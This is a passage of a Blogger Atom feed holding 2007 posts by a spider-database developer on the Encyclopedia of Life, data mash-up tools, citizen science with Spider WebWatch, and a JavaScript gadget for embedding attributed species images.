src="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rky1hkU3YaI/AAAAAAAAAAk/Pb-dUzXyqe0/s320/logo_zude.gif" border="0" alt=""id="BLOGGER_PHOTO_ID_5065623269176467874" /&gt;&lt;/a&gt;&lt;br /&gt;There's a new social networking application on the horizon that quite frankly, scares me. If you thought Facebook, MySpace, and other social networking applications or systems were pervasive &amp; viral, wait 'til Zude hits the scene. If you want a preview of the capabilities and have ~15-20 minutes to spare, I urge you to check out the ZDNet preview video: &lt;a href="http://zdnet.com.com/1606-2_2-6176625.html"&gt;http://zdnet.com.com/1606-2_2-6176625.html&lt;/a&gt;. David Berlind hinted that a beta of Zude would be available May 1st, but this hasn't yet happened. Marketing ploy to generate more interest? Not yet ready? No matter. When this appears, it'll completely change the landscape on the Internet and we'll collectively have to think very seriously about copyright and content ownership. Regardless of what happens on those fronts, it sounds as if a third party can license the drag-drop functionality in Zude. This has direct relevance to the MyEoL environment in &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7311182378608605549?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7311182378608605549/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7311182378608605549' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7311182378608605549'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7311182378608605549'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/remixing-web.html' title='Remixing the Web'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/Rky1hkU3YaI/AAAAAAAAAAk/Pb-dUzXyqe0/s72-c/logo_zude.gif' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-3153649882247699601</id><published>2007-05-11T19:51:00.000-06:00</published><updated>2007-05-18T22:51:39.339-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>The Living Encyclopedia - MyEoL</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/RkUklmDSzsI/AAAAAAAAAAU/CO6CTTIxpcY/s1600-h/myeol.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://4.bp.blogspot.com/_VYUFlXOCOxE/RkUklmDSzsI/AAAAAAAAAAU/CO6CTTIxpcY/s320/myeol.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5063493584336113346" /&gt;&lt;/a&gt;&lt;br /&gt;The greatest challenge engineers and architects for the &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; (EoL) will face is the proposed MyEoL, part of which will be the workbench for authors to contribute content. Without this, EoL degrades to a search engine with a spider (aka EoLbot) with a bit of Catalogue of Life name-smarts. In MyEoL, material must be made accessible in some form of drag-drop interface along with some form of textarea &lt;a href="http://www.google.com/search?q=define:wysiwyg"&gt;WYSIWYG&lt;/a&gt; box to write content. Images and snazzery (my new word-of-the-day) aside, it's ultimately the textual content that will drive discoverability. Afterall, this is the basis for any local or remote search engine index because image and video metadata are terrible. So how do you get contributors to sit down and type content? Do you first create a politically messy granting scheme by getting public funding agencies on-board to fund such manual efforts? Or, do you create something beyond the catch-phrase, Web 2.0?&lt;br /&gt;&lt;br /&gt;Like &lt;a href="http://ispecies.blogspot.com/2007/03/5-ways-to-mix-rip-and-mash-your-data.html"&gt;Rod Page&lt;/a&gt; of &lt;a href="http://darwin.zoology.gla.ac.uk/~rpage/ispecies/"&gt;iSpecies&lt;/a&gt; fame, I have been following the progress on mash-up technologies like Yahoo's Pipes, Dapper, OpenKapow and similar emerging tools. Nick Gonzalez has a &lt;a href="http://www.techcrunch.com/2007/03/02/5-ways-to-mix-rip-and-mash-your-data/"&gt;nice overview of these&lt;/a&gt;. The one that stands out from all these in my mind is &lt;a href="http://www.rssbus.com/"&gt;RSSBus&lt;/a&gt;. There are two reasons it hasn't quite caught on like Yahoo's Pipes and the others: 1. There is no slick user interface, and 2. it is not yet cross-platform. However, don't sell it short because it is far more powerful than most have given it credit. What really attracts me to RSSBus is its server to desktop and back (push-pull) architecture with the ability to use or create any sort of connector. One can pull xml data from an on-line resource, mix it with local Excel data or other data objects, then churn it out as an RSS feed if so desired. Here then is a superb opportunity for the systematics community - heck any biological community - to leverage this great work. Coincidentally, Donald Hobern (GBIF) has already coined a &lt;a href="http://eolinformatics.mbl.edu/Documents/hobern_technicalthoughts.html"&gt;Biodiversity Data Bus&lt;/a&gt; for EoL's server-server communications.&lt;br /&gt;&lt;br /&gt;&lt;em&gt;But why stop at the server environment?&lt;/em&gt; What would truly change the way we conduct biological research, thus building the EoL dream, is if this data bus were extended to the desktop. Wouldn't you like to mix your local data with that pulled from external resources? I sure would. Better yet, imagine creating a Facebook-like community of colleagues when preparing data for a manuscript. Each co-author contributes his/her data via their desktop RSSBus, leverages the great work on names management undertaken by the Catalogue of Life and uBio thus making a great first crack at merging data sets, then the co-authors in this little invite-only community can collectively work on analyses and presentation for the manuscript. What we typically have today with co-authored manuscripts is one or a few more individuals responsible for the grunt work of merging data sets and making sense of it. At the end of a much more simplified, RSSBus-like communal data merging effort, I would then be very much inclined to click a button and push such a creation or parts of this creation back out to EoL.&lt;br /&gt;&lt;br /&gt;What also hasn't been effectively discussed is how EoL will acquire content to feed its pages. Will it be an EoLbot like what was hinted at in a few press announcements or will it be something like DiGIR with canned or modularized Darwin Core-like elements? That may work for existing species page providers who serve their pages from a backend, but what about all that great, flat HTML content out there for which only traditional search engines like Google, Yahoo, MSN and other big players have been scouring? Does EoL intend to use Google, Yahoo, and others and scrape &lt;em&gt;their&lt;/em&gt; results to feed the initial EoL species pages? Yikes. That scares me  because these engines may and often do produce erroneous results...they haven't got biological intelligence. Google Images is particularly bad at handling nomenclature and image associations as I discovered with some of the indexed content from &lt;a href="http://canadianarachnology.dyndns.org/data/spiders/33233"&gt;The Nearctic Spider Database&lt;/a&gt; (e.g. &lt;a href="http://images.google.ca/images?source=ig&amp;hl=en&amp;q=pardosa%20moesta"&gt;HERE&lt;/a&gt;). Here's also where we might be creative with RSSBus if it could be married with something like &lt;a href="http://www.opensearch.org/Home"&gt;OpenSearch&lt;/a&gt; and a client-run spidering and indexing tool for their served content. One such example is the inexpensive &lt;a href="http://www.wrensoft.com/zoom/"&gt;Zoom Search&lt;/a&gt; that has lots of great plug-ins to read image metadata and ultimately produces an index through its spidering algorithms for use in a template-driven search portal. This sort of system with a UDDI registry would be really cool because attribution is then possible without any great deal of effort. Stripping canned results from Google or Yahoo to build the initial content does not come bundled with attribution for the source. EoL can essentially create a search engine for content providers, freely hand it out and content providers can pretty-up their search portal and spider their content as they want. This is great value because as with Zoom Search, content providers can log search queries and get a sense for what people are actually searching for on their pages. Behind the scenes, EoL pulls content via OpenSearch to feed the RSSBus scaffolding in MyEoL.&lt;br /&gt;&lt;br /&gt;Though this video doesn't really give RSSBus its deserved credit and it's tough to see the relevance in biology, it none the less provides a glimpse of what I have been talking about with the "Living Encyclopedia" as opposed to merely an "Encyclopedia of Life".&lt;br /&gt;&lt;br /&gt;&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/WBtjiFdMWQw"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/WBtjiFdMWQw" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-3153649882247699601?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/3153649882247699601/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=3153649882247699601' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3153649882247699601'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/3153649882247699601'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/living-encyclopedia-myeol.html' title='The Living Encyclopedia - MyEoL'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_VYUFlXOCOxE/RkUklmDSzsI/AAAAAAAAAAU/CO6CTTIxpcY/s72-c/myeol.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8253049606002111500</id><published>2007-05-10T09:42:00.000-06:00</published><updated>2007-05-18T22:51:52.828-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Encyclopedia of Life</title><content type='html'>The &lt;a href="http://www.eol.org"&gt;Encyclopedia of Life&lt;/a&gt; was officially launched yesterday and I have been reading various public postings to guage response.&lt;br /&gt;&lt;br /&gt;&lt;object height="350" width="425"&gt;&lt;param name="movie" value="http://www.youtube.com/v/6NwfGA4cxJQ"&gt;&lt;param name="wmode" value="transparent"&gt;&lt;embed src="http://www.youtube.com/v/6NwfGA4cxJQ" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Of all these I have tried to scan, &lt;a href="http://science.slashdot.org/science/07/05/08/226230.shtml"&gt;Slashdot&lt;/a&gt; is perhaps the most active and most informative. So, here is my best attempt at summarizing public reception:&lt;br /&gt;&lt;br /&gt;1. There's a notable lack of understanding for how this will be different from WikiSpecies. There is little to no appreciation for the challenge of names management of the kind spearheaded by uBio. This is a critical piece of the puzzle that cannot be done in a 2-dimensional wiki environment.&lt;br /&gt;&lt;br /&gt;2. Most people understand that content will be developed by first "harvesting" material scattered on the Internet then cleaned-up by "scientists". But there has been little to no discussion on how that will be accomplished or how accreditation will be maintained.&lt;br /&gt;&lt;br /&gt;3. There hasn't yet been much discussion on the TAXACOM or ENTOMO-L listservs about the encyclopedia. A few suggested that monies would be better put into pure systematics rather than into a "bean-counting" exercise. Others recognize that the content will necessarily be created by systematists, but see that there is as yet no incentive to do so. Millions of $$ are dumped into scanning materials, wages, etc. but how does that filter down to individual contributors?&lt;br /&gt;&lt;br /&gt;4. The "MyEoL" vs. the canonical "EoL" content is not well appreciated.&lt;br /&gt;&lt;br /&gt;5. Timeframe for "completion" has been grossly misunderstood. Many believe they have to wait for 10 years to see anything come out of EoL.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;The EoL Workbench: "The Living Encyclopedia"&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;While I do think an Encyclopedia of Life will be a most amazing resource, there is a very large &amp; critically missing piece of the puzzle as it relates to #3 in my list above. The EoL promotional video grandly expresses that such an encyclopedia will transform the science of biology. How? What we see to date is a digital version of a paper encyclopedia with a bit of gadgetry to encourage public participation. If this is to transform biology, it must simplify communications or the work flow in day-to-day biological pursuits. This is where my "Living Encyclopedia" idea comes in.&lt;br /&gt;&lt;br /&gt;First, the communications required to conduct revisionary work need to be very well understood. For starters, ALL type specimens must first be made available &amp; directly tied to direct channels of communication to the curators charged with maintaining those holdings. The folks at GBIF have taken great first steps, but digital representations of ALL type specimens accessible via DiGIR, TAPIR or other means is no where near complete. Systematists must still scour old literature to learn where type specimens are held, write letters, etc. before acquiring specimens BEFORE any serious revision can be started.&lt;br /&gt;&lt;br /&gt;Second, there is currently no effective link between publishers of taxonomic literature &amp; the nomenclators. Before that happens, an encyclopedia will be woefully dated.&lt;br /&gt;&lt;br /&gt;So here's the idea...&lt;br /&gt;&lt;br /&gt;Integrated into "MyEoL" ought to be a blank slate - an organizational workbench if you will. Here, systematists run very simple web service queries to GBIF to create a visual "cloud" of specimens of interest. This would be much like Yahoo's Pipes. Through drag-and-drop, communications to curators is coordinated for loans. A systematist would continue to use this tool to add/remove specimens according to the concept they are working with, connect pieces of the cloud to other resources like those in GenBank, insert references, etc. all via drag-drop. Upon completion of the work, the circumscribed specimens and the entire visual representation of the workflow is "locked" and a permanent URL is issued, which can and ought to be present in the eventual publication. When the publication is accepted, the systematist then returns to the workbench to insert the publication's DOI. In such a manner, all the digital bits are in place. This permanent URL that describes the circumscription of specimens is then in the public domain such that other systematists may examine the "guts" behind the publication. Once all is said and done, this then becomes the scaffolding for a species page in EoL.&lt;br /&gt;&lt;br /&gt;This is vastly different than a purely post-hoc encyclopedia because the incentive is a simplified &amp; accelerated workflow - a much lower-level entry point. So, the amount of teeth-pulling required to build an effective Encyclopedia of Life with content written by the scientific community is vastly reduced. The former model doesn't require accreditation for resources or material but the present model is a mess of very difficult "mash-ups". Sure, a first crack at the encyclopedia can be harvested content, but to be sustainable, it has to either adopt a distasteful monitization scheme (i.e. supported by click-through advertising) or create a low-level, organizational workbench of immense value to the scientific community, very easily expressed to government and public fund agencies like NSF, NSERC, etc.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8253049606002111500?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8253049606002111500/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8253049606002111500' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8253049606002111500'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8253049606002111500'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/encyclopedia-of-life.html' title='Encyclopedia of Life'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8168440459126488504</id><published>2007-04-30T14:16:00.000-06:00</published><updated>2007-05-10T11:20:21.137-06:00</updated><title type='text'>Biodiversity Informatics relevance</title><content type='html'>For a long time now, I have been thinking about the relevance of biodiversity informatics in entomology/arachnology circles. Most entomologists grasp the idea of federated data from museums &amp;amp; private collectors, but I don't think many realize the potential for these data in their own research programs or would even think of looking for data outside their immediate reach. Like the majority of ecologists, entomologist/arachnologists do not have any desire to share data. In fact, most will refuse to do so for fear of being "scooped". This may simply be the "old-guard" stigma, but I fear not.&lt;br /&gt;&lt;br /&gt;I just read a review in Annual Review of Entomology entitled, "Biodiversity Informatics" by Norm Johnson (&lt;a href="http://arjournals.annualreviews.org/doi/abs/10.1146/annurev.ento.52.110405.091259"&gt;doi:10.1146/annurev.ento.52.110405.091259&lt;/a&gt;). In all honesty, the review seemed dumbed down and I suspect this wasn't Norm's doing, but was done at the behest of the editor or reviewers. In particular, I would have liked to have seen more on GUIDs and how these relate to aggregation of data, literature, etc. This is sadly lacking and we need real-world reasons or examples for making use of GUIDs and not merely name strings.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8168440459126488504?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8168440459126488504/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8168440459126488504' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8168440459126488504'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8168440459126488504'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/04/biodiversity-informatics-relevance.html' title='Biodiversity Informatics relevance'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7377592608090583409</id><published>2007-04-27T18:02:00.000-06:00</published><updated>2007-10-25T13:38:40.741-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='citizen science'/><category scheme='http://www.blogger.com/atom/ns#' term='spiders'/><title type='text'>Citizen Science...spider style</title><content type='html'>&lt;div&gt;I have been developing The Nearctic Spider Database for a number of years now. All the nomenclature, database, and web page development are under my purvue, but individuals who have demonstrated some form of expertise on spider systematics, biogeography, etc. have the option to author and/or review species pages. They can upload imagery, select references, add descriptions, plus a number of other functions all via the website. These productions are then open for review in the very traditional sense. Once three reviews have been received and the author has made any suggested changes as expressed by the anonymous reviewers, I receive notice, flick the switch, and the species page is tagged "Peer reviewed" then locked for further editing. However, all point collection maps, other taxonomic references, lists of synonyms &amp; chresonyms, and a phenological chart are dynamically created and may change with additional data from the specimen side of the database.&lt;br /&gt;&lt;br /&gt;Since this sort of "expert" authoring/reviewing cut off all option for the casual browser of these pages to contribute, I created a "drop a comment" feature whereby anyone and everyone may write a casual comment on a species, a sighting report, etc. in a manner much like leaving a comment on someone else's blog post. Response to this new feature has been fairly good so, at the request of a few contributors to the database, I created "&lt;a href="http://www.spiderwebwatch.org"&gt;Spider WebWatch&lt;/a&gt;" - a citizen science initiative for anyone and everyone to submit observations on spiders they see in their backyard and elsewhere.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;a href="http://www.spiderwebwatch.org"&gt;&lt;img id="BLOGGER_PHOTO_ID_5058536900018753202" style="DISPLAY: block; MARGIN: 0px auto 10px; CURSOR: hand; TEXT-ALIGN: center" alt="" src="http://2.bp.blogspot.com/_VYUFlXOCOxE/RjOIgmDSzrI/AAAAAAAAAAM/b0Vdux2ka1s/s320/Logo_large.png" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;Granted there is no way to track misidentifications, issues arising from nomenclatural change in the event of a revision and other issues that plague or otherwise bring into question the longevity and utility of the data in scientific research, the point of Spider WebWatch is for anyone to contribute. In this way, the hope is more pervasive interest in spider biodiversity research...sort of like a gateway or an introduction to araneology. To limit some of the issues with observational data, there are only 9 species in Spider WebWatch. A &lt;a href="http://www.canadianarachnology.org/forum/viewtopic.php?t=157"&gt;discussion&lt;/a&gt; in The Nearctic Arachnologists' Forum helped choose these 9 species.&lt;br /&gt;&lt;br /&gt;I took the "drop a comment" feature on species pages in The Nearctic Spider Database to a much more interactive level and permit "WebWatchers" in Spider WebWatch to not only upload an observation with an image but to comment on anyone else's observation, thus building threads of discussions in a manner very much like a forum. A contributor may edit their observations or comments at any time and the system for contributing an observation is stripped down to the bare minimum. It was brought to my attention that a web form with too many fields or boxes to tick/fill is overwhelming.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;So, try out Spider WebWatch. I also have a poll underway to get some feedback on the possibility of using a web-enabled mobile phone to submit an observation.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7377592608090583409?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7377592608090583409/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7377592608090583409' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7377592608090583409'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7377592608090583409'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/04/citizen-sciencespider-style.html' title='Citizen Science...spider style'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_VYUFlXOCOxE/RjOIgmDSzrI/AAAAAAAAAAM/b0Vdux2ka1s/s72-c/Logo_large.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-4111161495166279965</id><published>2007-04-27T16:34:00.000-06:00</published><updated>2007-10-06T14:39:43.769-06:00</updated><title type='text'>Client-orchestrated Data Repurposing</title><content type='html'>A lot of work is underway by various working groups within &lt;a href="http://www.tdwg.org/"&gt;TDWG&lt;/a&gt; to connect one machine to another for intelligent data exchange systems. For example, &lt;a href="http://digir.sourceforge.net/"&gt;DiGIR&lt;/a&gt; and BioCASE (soon to superseded by &lt;a href="http://wiki.tdwg.org/twiki/bin/view/TAPIR/"&gt;TAPIR&lt;/a&gt;) are nifty systems to create on-the-fly XML documents whose data they contain can be dumped into other databases. This of course is all behind-the-scenes with no direct benefit to providers of their biodiversity data except I suppose a demonstration to administrators that they have contributed to the greater good. Eventually, somewhere down the line, there may be some sort of attribution but there's no guarantee.&lt;br /&gt;&lt;br /&gt;GBIF does a great job of maintaining attribution because the ultimate goal is to permit someone who uses their website to discover where a specimen can be found &amp; to contact the curator. However, there's nothing stopping anyone from aggregating data from DiGIR providers and repurposing it without any sort of attribution or "link" back to the provider. In other words, an institution could potentially have to cough up a lot of funds to keep the bandwidth pipes flowing and there may not be any immediate value. These sorts of thoughts fly in the face of open access. Don't get me wrong, I'm all for open access, I'm just not certain if such a model for aggregating biodiversity data in museums and elsewhere is sustainable. What is at least needed is an auditing &amp;amp; logging tool associated with DiGIR (or TAPIR) such that providers of biodiversity data may collect data on who used their resource, what was downloaded and what traffic patterns have been like over 'x' number of days, weeks, months, etc. But, I know of no such add-on for DiGIR or BioCASE providers.&lt;br /&gt;&lt;br /&gt;So, I have been looking into alternative means to share resources and have played around with various ideas. One such idea takes the form of gadgets to share imagery. There are a ton of really useful images of immense biological value and when these are shared around, it becomes impossible to know where the original image was first made available and who provided it. One could use meta tags and embed that data within the image, but who does that? If there was a browser-based meta tag reader for images for web programmers to tap into, then meta tags would be obvious. However, I'm not aware of any browser plug-in that can do that. So, here's a gadget script that can be copied and pasted onto a web site:&lt;br /&gt;&lt;br /&gt;&lt;form name="gadget"&gt;&lt;textarea name="gadgetcopy"  rows="10" cols="50" size="30"&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/linking/deeplinkjs.asp?species=18655&amp;amp;imagetype=habitus&amp;amp;title_color=%23000000&amp;amp;w=450&amp;amp;h=301&amp;amp;s=yes&amp;amp;border=none+2px+%23000066"&gt;&lt;/script&gt;&lt;/textarea&gt;&lt;/form&gt;&lt;br /&gt;&lt;br /&gt;And here's the result:&lt;br /&gt;&lt;br /&gt;&lt;script type="text/javascript" src="http://www.canadianarachnology.org/linking/deeplinkjs.asp?&lt;br /&gt;species=18655&amp;amp;imagetype=habitus&amp;amp;title_color=%23000000&lt;br /&gt;&amp;amp;w=450&amp;amp;h=301&amp;amp;s=yes&amp;amp;border=none+2px+%23000066"&gt;&lt;br /&gt;&lt;/script&gt;&lt;br /&gt;&lt;br /&gt;The gadget itself is dynamically-created JavaScript that pulls all the bits from the Nearctic Spider Database. The species nomenclature, attribution, and link to the species page are automatic &amp;amp; could change should I change anything in the database. These changes would of course cascade through all instances of the script where ever these may be. The individual who "made" the gadget can however pretty it up as they might like through a little configuration tool I have. Feel free to mess with that by clicking a "Link it" button here: &lt;a href="http://www.canadianarachnology.org/data/spiders/18655"&gt;http://canadianarachnology.dyndns.org/data/spiders/18655&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Something like this gadget system is by no means rocket science but has immediate value to the provider and the individual wishing to repurpose it for their web site.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-4111161495166279965?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/4111161495166279965/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=4111161495166279965' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4111161495166279965'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/4111161495166279965'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/04/client-orchestrated-data-repurposing.html' title='Client-orchestrated Data Repurposing'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8477452678869409402</id><published>2007-04-26T17:36:00.000-06:00</published><updated>2007-10-06T14:40:37.092-06:00</updated><title type='text'>Inaugural Post</title><content type='html'>I'm a latecomer to the blog scene so thought I'd try my hand at it.&lt;br /&gt;&lt;br /&gt;This blog will include bits that have fallen off the wagon as it were while developing &lt;a href="http://www.canadianarachnology.org"&gt;The Canadian Arachnologist&lt;/a&gt;, &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/"&gt;The Nearctic Spider Database&lt;/a&gt;, &lt;a href="http://www.canadianarachnology.org/forum/"&gt;The Nearctic Arachnologists' Forum&lt;/a&gt; and &lt;a href="http://www.spiderwebwatch.org"&gt;Spider WebWatch&lt;/a&gt;. The latter is a citizen science initiative that accepts observation data on 9 ambassador species in North America. I have a strong interest in federating biological data so there will undoubtedly be posts about nomenclatural management, species concepts, data aggregation techniques and the like.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8477452678869409402?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8477452678869409402/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8477452678869409402' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8477452678869409402'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8477452678869409402'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/04/inaugural-post.html' title='Inaugural Post'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry></feed>
